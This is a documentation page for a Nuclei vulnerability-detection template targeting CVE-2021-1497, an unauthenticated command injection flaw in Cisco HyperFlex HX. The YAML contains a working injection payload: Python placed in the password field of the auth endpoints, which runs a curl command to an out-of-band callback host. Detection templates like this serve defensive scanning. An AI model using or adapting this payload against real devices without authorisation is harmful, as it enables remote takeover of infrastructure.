Cisco HyperFlex HX Data Platform - Remote Command Execution
ID: CVE-2021-1497
Severity: critical
Author: gy741
Tags: cve,cve2021,cisco,rce,oast,kev,packetstorm
Description
Section titled “Description”Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
YAML Source
Section titled “YAML Source”id: CVE-2021-1497
info: name: Cisco HyperFlex HX Data Platform - Remote Command Execution author: gy741 severity: critical description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. remediation: | Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://nvd.nist.gov/vuln/detail/CVE-2021-1497 - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html - https://twitter.com/Unit42_Intel/status/1402655493735206915 - https://twitter.com/ptswarm/status/1390300625129201664 - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-1497 cwe-id: CWE-78 epss-score: 0.97512 epss-percentile: 0.99982 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\(2a\):*:*:*:*:*:*:* metadata: max-request: 2 vendor: cisco product: hyperflex_hx_data_platform tags: cve,cve2021,cisco,rce,oast,kev,packetstormvariables: cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"' payload: '123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("' useragent: '{{rand_base(6)}}'
http: - raw: - | POST /auth/change HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode(payload)}} - | POST /auth HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode(payload)}}
matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"
- type: word part: interactsh_request words: - "User-Agent: {{useragent}}"# digest: 4b0a004830460221008bd1b9b52a0def7ce9df6f85370849becc0d212ccdd16ac6412bfdf127295f42022100a7151153222281035158aab8ae17d7c2c3eb6bde6f9cfe023494752dd4017087:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-1497.yaml"